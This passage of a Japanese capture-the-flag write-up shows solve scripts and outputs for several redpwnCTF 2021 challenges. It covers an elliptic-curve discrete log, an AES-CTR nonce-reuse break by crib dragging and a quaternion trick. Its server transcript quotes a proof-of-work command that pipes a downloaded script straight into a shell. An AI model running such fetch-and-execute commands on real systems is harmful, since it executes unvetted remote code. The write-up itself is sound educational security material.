p.recvline().rstrip() print data for i in range(3): print todoes[i] p.sendline(todoes[i]) data = p.recvline().rstrip() print data data = p.recvline().rstrip() print data for _ in range(3): data = p.recvline().rstrip() print data
実行結果は以下の通り。
[+] Opening connection to mc.ax on port 31796: Done add ingredients to the bowl add flour flour has been added add yeast yeast has been added add salt salt has been added add water water has been added the ingredients are added and stirred into a lumpy dough hide the bowl inside a box the box is nice and warm the bread needs to rise wait 3 hours the dough has risen it is time to finish the dough work in the basement you bring a bottle of oil and a tray the dough is done, and needs to be baked preheat the toaster oven the oven glows a soft red-orange the bread is in the oven, and bakes for 45 minutes set a timer on your phone the timer ticks down 45 minutes is an awfully long time watch the bread bake the bread has risen, touching the top of the oven and catching fire there's no time to waste pull the tray out with a towel the flaming loaf sizzles in the sink there's smoke in the air unplug the oven the oven shuts off unplug the fire alarm you put the fire alarm in another room open the window cold air rushes in the kitchen is a mess wash the sink the sink is cleaned clean the counters the counters are cleaned flush the bread down the toilet the half-baked bread is disposed of get ready to sleep everything appears to be okay time to go to sleep close the window the window is closed replace the fire alarm the fire alarm is replaced brush teeth and go to bed you sleep very well it's the next morning mom doesn't suspect a thing, but asks about some white dots on the bathroom floor flag{m4yb3_try_f0ccac1a_n3xt_t1m3???0r_dont_b4k3_br3ad_at_m1dnight} [*] Closed connection to mc.ax port 31796
flag{m4yb3_try_f0ccac1a_n3xt_t1m3???0r_dont_b4k3_br3ad_at_m1dnight}
blecc (crypto)
全体的に比較的数値が小さいので、orderを素因数分解して離散対数問題を解く。
#!/usr/bin/sage from Crypto.Util.number import * p = 17459102747413984477 a = 2 b = 3 G = (15579091807671783999, 4313814846862507155) Q = (8859996588597792495, 2628834476186361781) F = FiniteField(p) E = EllipticCurve(F, [a, b]) G = E.point(G) Q = E.point(Q) factors, exponents = zip(*factor(E.order())) primes = [factors[i] ^ exponents[i] for i in range(len(factors))] dlogs = [] for fac in primes: t = int(G.order()) / int(fac) dlog = discrete_log(t*Q, t*G, operation='+') dlogs += [dlog] d = crt(dlogs, primes) print '[+] d =', d assert d * G == Q flag = long_to_bytes(d) flag = 'flag{%s}' % flag print '[*]flag =', flag
実行結果は以下の通り。
[+] d = 7868191182322623331 [*]flag = flag{m1n1_3cc}
flag{m1n1_3cc}
yahtzee (crypto)
サーバの処理の概要は以下の通り。
・true_rng = TrueRNG(2) ・rolls = 2 ・quitするまで以下繰り返し ・message = random_message().encode() ・quotesの25行のうちランダムの行をスペース区切りの配列にして、どこかの要素にフラグを挿入する。 ・encrypted = encrypt(message, key, true_rng) ・nonce = true_rng.next() ・TrueRNG.yahtzee(2) ・dice = 2個の1~6のランダム値の配列 ・diceの合計を返す。 ・AES-CTR暗号化 →表示
nonceは2~12の11通り。とりあえず出力を見てみる。
$ nc mc.ax 31076 proof of work: curl -sSfL https://pwn.red/pow | sh -s s.AAATiA==.z34uX6azbkYSA7Lxu93WPw== solution: s.P908u4Z4PUcNfpELBVV51t3d2C19aIBqkSTEZ7nzpOGkUHOo2IgPxBa5YwiX/0wzOd5dm3/iACvJEpuOGdm5Fis7YHtDXZAOamUUxSzicaQAQ/owWvI60YAYv7q434ULEfrv/hhAaVZgfTeZtfIj75f6A2ScwsbniMaN6dO2RxaOSbdWR6g19uJEqQWx7lPNCFqL/f4cAi22xTSFa3bfEA== ============================================================================ = Welcome to the yahtzee message encryption service. = = We use top-of-the-line TRUE random number generators... dice in a cup! = ============================================================================ Would you like some samples? y Ciphertext: 2c19383b50c4b6f73821318124a186a352d713f0432dccd6305367892a1d2495c61edbe1015ab4fee8f7bc34ab59b3abad8c59c5a3a7ae16a43f7c2b8d7acf5a3eb804936d507aed55142cb5259dab8f83124641f32c4dbca21daecc20a0e94ec9ce9980073ad53e3c Would you like some more samples, or are you ready to 'quit'? y Ciphertext: b893de780007c68f9a99e768b74826588f289a602506ce3e72357568a349b712f206ae5d8f60ce46e51c0ed4d37954c0a647391b28e43185e8312420910ff15a79b4a2f0d111b7babc56d46d01a2c9d70bd7daf8c8c26c251c19d0325c86ec735a39b2819cc832 Would you like some more samples, or are you ready to 'quit'? y Ciphertext: 10f31e469309e0aa0c6768e852ebacb028d4fe71aa636e015d3117da86d6f5dde013d3327519b43a1ea81f81ea80800772c63e81314447e531d818de4ce8902f77047c0244b18fa2480794c0e6d74d3297c9b4e19c2e2160bfd114a24c7e657abac2e96d56a5e242135e52ff18b2632b59ad02e9 Would you like some more samples, or are you ready to 'quit'? y Ciphertext: 4fd2dfe89dc578470c8bed4059342f068405ce54719e6f1152ea1615ecb598b59bce9b13b231c6c51ec63337b3b12df13421ca0fcff1697944fbf91c39766c440f0b0c11ae9f9c01173d161c6649f5fa9fe10893274bd7a4f984adae98c0835133 Would you like some more samples, or are you ready to 'quit'? y Ciphertext: 8ec3ff77926c5e462412e17d4b342dba922f03e456b4a6abe96bdd6b824e343a1530224f69705abc80af990adda56b95a767d5f1a14392a59e105e0a3010f4795f596a2166e1a0242e35a071f2452a95da08dee32976d73751daea2d9d3466b1967bbbae522329c834 Would you like some more samples, or are you ready to 'quit'? y Ciphertext: 91135aa897cc7cf173e770d926f6cc00c95840aee34aa4ecf0dc2fd5fefbe641774ded4e5f69201dc68314579a03b380e86a2404f08c6ad03573c1f0cce76350b27d3e29a51ecbe37d9f6d63750947b90bc000c42270861980dcfc0ce782a8ce093a656a87b899584e1b1d6c Would you like some more samples, or are you ready to 'quit'? y Ciphertext: 800d5afa8cdd67ec3df439cd2ca3ce0ac94e40aeea45b4e58fff6981ef84e548611fec0d207e0a23879e4044cd1ce4dd9c673741f1c97ede356384f689fd6450a97a7338ed1298ac6f9b69762e4a468239d45ed65d628b1d80c1 Would you like some more samples, or are you ready to 'quit'? y Ciphertext: 4297d8ecd3c26356428fbe430b342d53811d8f5c6c8e6a3725b84b00d4bac0b8b6aadc7da821ed9e15c072749ca61f8e773acc0d90f275240debb01a326621440f0b1006a282d5012e721e1f3208baeccdef008a645e94a3f6c1b6b2d5c1884674a7b36d3a6881 Would you like some more samples, or are you ready to 'quit'? y Ciphertext: 2c1e323b50caabfa382a3ec737bbc5b74cc613ea443082d77c5b73d26e1d1ee2964accd7065bbee2fbf08c7a8565f4e9f98a01d0faa8eb09b9697c36ca37c55d29f419c17c5479ff161f3daf6ac8be86c2025851fa017fa8ff0087d126a2bb12cfe3d7a93d68c93960c01af99c Would you like some more samples, or are you ready to 'quit'? y Ciphertext: 8387826491977894a631ffc36ceceeeec47b3d1413b2eec57122b48bdfbc1e89505278536a206704ea830cf6b58c15b8ed8f6e7d162a535f1387ba3672383fd60d798218cf30d6bd6fcc2bc616243861b7adbb14ea6f86d582807e0a50505e92977e6f Would you like some more samples, or are you ready to 'quit'? y Ciphertext: a8218c72990c679179fdffdd06f220d75f1b95be324363c5d71e926a7ac77d8260934a4b7bbbada3f22031a71201770cbfde374d343ee8435be5f606a7d6a2ac7f098e84ccb900ac8b9631138636db48f0ff4bce8f4d5f3e569d2f985b76fefe8ec454dc82c3fe99f3937b309a68bb75 Would you like some more samples, or are you ready to 'quit'? y Ciphertext: 9b8ce0328d7e5f51240aef321e2161ba873113e26697b2fcf155ce78d754581e7e6f194f2e764bbc83acbf19b2943d8db667c5ecb95ad7e996465a0d2444fa674859603675e5bf777a25ac77f710389e830bd3aa2663927958c4b2 Would you like some more samples, or are you ready to 'quit'? y Ciphertext: b893de780007c68f9a99e768b74826588f289a602506ce3e72357568a349b712fa06bf55dd7dce5ce50a46cb817855c3a04139192fa039dca972203b810efd4268f5a2f6c207ebba8104dc6545e388c900ccd6e4c5d16c241f4e93★ Would you like some more samples, or are you ready to 'quit'? y Ciphertext: 2a133a7e50c7bdfc383a3fc025f2c8ad549254fb582d85de3b12779a7b015bbb9d5a8fc9145ca5acb2f7c3298b6be5b1b0930cc6fabbae0da2277120983cd5436ceb1493675a72be1a1069b02889bf91930d7c36a66f5cc3ba1cbdd77db4964ff3e38a881629973d6b8d4aec9456181d Would you like some more samples, or are you ready to 'quit'? y Ciphertext: 68b61df4fed11c522b7abf14f5541c6af3ab5efa3b51dba1cae8317e0ed78e2f4ebcb21ef8cce4853db51f3674afacfd084c92731e3d78ce919c483be73bc01d472a3cccd867a148cea9242077712d317be9282fe13519888b336b35dd Would you like some more samples, or are you ready to 'quit'? y Ciphertext: 3d00326944d1b0e7762977d83ea7d0a700d45fff4b22dcd8036534c36e2a0faa975d9ccd2a5c9ed3e8ea9728d476f9b8f99b1fd0a8faf91ba33d7021ca33d30f23f64095605437f1011e2ca4649bb18ec6454c07b2384dfdbc5a Would you like some more samples, or are you ready to 'quit'? y Ciphertext: 9296d97a5b5eddf0bac5b768c84b2b1d907a825a6b20e5213c206b2fb249b912d347bc10cd6bc45ce95d4fc8d67749c6e544701822e43a90a93536629a25cb1d3ca193e7dc07eba98629db4f7ef087d30b88cef4d6962e2f54 Would you like some more samples, or are you ready to 'quit'? y Ciphertext: 9fdfcf7a0944c1beedcbba7d8f477e55a24cdd0e3f16e5657933342b8c5e856d8848bb429f7ed84fe50a46cb817855c3a04139192fa039dca972203b810efd4268f5a2f6c207ebba8104dc6545e388c900ccd6e4c5d16c241f4e93★
2か所似ている暗号が出力されている。全体の長さが同じで、先頭40バイトが異なり、それ以降は全く同じため、フラグを挿入する前の文は同じで、nonceは同じと思われる。
先頭40バイトは以下の2パターンになっているはず。
・quotesの文の一部+flag ・flag+quotesの文の一部
先頭40バイトはkeyが同じなので、推測しながら復号する。異なる部分の暗号は以下の2つ
・9fdfcf7a0944c1beedcbba7d8f477e55a24cdd0e3f16e5657933342b8c5e856d8848bb429f7ed84f ・b893de780007c68f9a99e768b74826588f289a602506ce3e72357568a349b712fa06bf55dd7dce5c
$ python xorstrings.py 9fdfcf7a0944c1beedcbba7d8f477e55a24cdd0e3f16e5657933342b8c5e856d8848bb429f7ed84f b893de780007c68f9a99e768b74826588f289a602506ce3e72357568a349b712fa06bf55dd7dce5c 274c11020943073177525d15380f580d2d64476e1a102b5b0b0641432f17327f724e041742031613 $ python cribdrag.py 274c11020943073177525d15380f580d2d64476e1a102b5b0b0641432f17327f724e041742031613 Your message is currently: 0 ________________________________________ Your key is currently: 0 ________________________________________ Please enter your crib: flag{ *** 0: "A per" 1: "*}cn8" 2: "wnh$|" 3: "de"`J" 4: "o/fV " 5: "%kP)" 6: "a]5&" 7: "W3:n" 8: "><rC" 9: "41t_t" 10: ";yYh#" *** 11: "sTn?v" 12: "^c9jV" 13: "i4lJ" 14: ">aL<" 15: "kA " 16: "& a" 17: "+}k" 18: "!{wP" 19: vqL " 20: "||J<p" 21: "vG:l}" *** 22: "M7ja:" 23: "=gg&8" 24: "mj $T" 25: "`-"Hl" 26: "'/NpI" 27: "%CvU" 28: "I{S " 29: "q^5" 30: "T)" 31: "/cl" 32: ""ep9" 33: "(hv%x" 34: "b{#dm" *** 35: "q.bqh" Enter the correct position, 'none' for no match, or 'end' to quit: 0 Is this crib part of the message or key? Please enter 'message' or 'key': key Your message is currently: 0 A per___________________________________ Your key is currently: 0 flag{___________________________________ Please enter your crib: flag{ *** 0: "A per" 1: "*}cn8" 2: "wnh$|" 3: "de"`J" 4: "o/fV " 5: "%kP)" 6: "a]5&" 7: "W3:n" 8: "><rC" 9: "41t_t" 10: ";yYh#" *** 11: "sTn?v" 12: "^c9jV" 13: "i4lJ" 14: ">aL<" 15: "kA " 16: "& a" 17: "+}k" 18: "!{wP" 19: vqL " 20: "||J<p" 21: "vG:l}" *** 22: "M7ja:" 23: "=gg&8" 24: "mj $T" 25: "`-"Hl" 26: "'/NpI" 27: "%CvU" 28: "I{S " 29: "q^5" 30: "T)" 31: "/cl" 32: ""ep9" 33: "(hv%x" 34: "b{#dm" *** 35: "q.bqh" Enter the correct position, 'none' for no match, or 'end' to quit: 9 Is this crib part of the message or key? Please enter 'message' or 'key': message Your message is currently: 0 A per____flag{__________________________ Your key is currently: 0 flag{____41t_t__________________________ Please enter your crib: son 0: "T#"" 1: "?~l)" *** 2: "bmgc" 3: "qf-'" 4: "z,i" 5: "0h_W" 6: "t^r" 7: "B<}" 8: "=35" 9: "!2{" 10: ".zV/" *** 11: "fWax" 12: "K`6-" "3: "|7c 14: "+bCD" 15: "~B g" 16: "^ )N" 17: "(:" 18: "4t0" 19: "u~ " 20: "iE{" 21: "cD5+" 22: "X4e&" 23: "(dha" 24: "xi/c" 25: "u.-" *** 26: "2,A7" 27: "0@y" 28: "\x\_" 29: "d]R" 30: "An" 31: " $" 32: "!j7" 33: "=kyb" 34: "wx,#" 35: "d-m6" *** 36: "1lx3" Enter the correct position, 'none' for no match, or 'end' to quit: 5 Is this crib part of the message or key? Please enter 'message' or 'key': message Your message is currently: 0 A person flag{__________________________ Your key is currently: 0 flag{0h_W41t_t__________________________ Please enter your crib: 0h_W41t_t 0: "$NU=rsn" 1: "|y]^w6E(&" )" "!jV3 3: "2aPF&a" 4: "9+XfCc)JL" 5: "son flag{" 6: "7Y(i$LP," 7: " ! {y" 8: "G:B >,RY" 9: "b5Jo;iyr" 10: "m}gXl<Y;3" 11: "%PP9" 12: gZU31n" 13: "?0RzPvEd" 14: "her3s_nO_" 15: "=E;Z+dt/" 16: " 9.!_" 17: "T/1M$/Tr" 18: "wEGjY5" 19: "^rO|o:r7" 20: "*xt ?75[" 21: " C\2p7pc" 22: "3TQur[HF" 23: "kcYwcm " 24: ";n&F " 25: "6)x# -:" 26: "q+p@Np" 27: "sGHeKC:[c" 28: "m(FpH6" 29: "'Z %z5cw" 30: "-0&6\b" 31: "OS#swIg" Enter the correct position, 'none' for no match, or 'end' to quit: 14 Is this crib part of the message or key? Please enter 'message' or 'key': message Your message is currently: 0 A person flag{0h_W41t_t_________________ Your key is currently: 0 flag{0h_W41t_ther3s_nO__________________ Please enter your crib: her3s_nO 0: "O)c1zi~" 1: "$tp:0X_8" 2: "yg{ptn" 3: "jl14B(<" 3Z""a&u 5: "+bCD!{w" 6: "oTa.JV@" 7: "Y nfga" 8: "7/&KP6B" 9: ":8g |cb" 10: "5pJ<+RC+" 11: "}]}k~r " 12: "Pj*>^;)!" 13: "g=U" 14: "0h_W41t_" 15: "eHtE~d" 16: "E5]iOE" 17: " ")ct5D" 18: "/ h#XeI" 19: "b(Th" 20: "ruYhxY/ " 21: "xN)8u-`" 22: "C>y52AX" 23: "3ntr0py}" 24: "cc3p\H\0" 25: "n$1dm=" 26: ")&]$A " 27: "+Je - K" 28: "Gr@LjX" "=[y"W 30: "Z}wH,L" 31: "<7dmY" 32: "+v$1\x\" Enter the correct position, 'none' for no match, or 'end' to quit: 23 Is this crib part of the message or key? Please enter 'message' or 'key': message Your message is currently: 0 A person flag{0h_W41t_ther3s_nO_________ Your key is currently: 0 flag{0h_W41t_ther3s_nO_3ntr0py}_________
flag{0h_W41t_ther3s_nO_3ntr0py}
quaternion-revenge (crypto)
$ nc mc.ax 31868 n: 109407261225601290979646993307199045582771989091617528040453388668527729655364021294073786236928010288425931170033882500008141737282348381080859938184708804261036670840857901348501188283821065103049160013518150182035783438575945282872216684014487995809554297629331427519782755136732060248945297800684475538669 l: 1024 c1: 8004256688474344817870233833875940222941935887236015063020756596204632736684872367826070568041179498012108632998282142428784927079034900107638096754487286 c2: 4072287980754638763334170410426881140079193675181120657395601634493823175738330991693959371966799518587104964948856594595459994325207179456447135423397260 Calculate the left quaternion isomorphism of m: >>>
適当に試してみる。
$ nc mc.ax 31868 n: 86130025636062055956513705083930642167992989060850106586281533247785660295367892438990867856454597008437399796578554368813552223751092749003124747057080792118304583487867234267309926248815120163138042117181301840830034157223307134822520786058567011588349160660968369137756745079514802619272300098374308411299 l: 1023 c1: 9593237318463895403485245835019899101341699250286125466299423268449833221079568272438381700968557138900898253166344975020822465215214852631020599973244033 c2: 4265549705909481277885344297128796851846735962116752700305188804452208934636515673843776196495539597068674270572889618802045156010757400818748543749630735 Calculate the left quaternion isomorphism of m: >>> i+j flag{00p5_1_l13d_r0fl}
フラグが表示された。i*jでも表示されるが、理論的な説明はできない。
flag{00p5_1_l13d_r0fl}
survey (misc)
アンケートに答えたら、以下のURLが表示された。
https://static.redpwn.net/content/survey-i9cbpsiv2d6x3zz9.txt
ここにアクセスしたら、フラグが表示された。
flag{thank5_f0r_play1ng_r3dpwnctf_2021!_zc9e848yg2gdhwxz}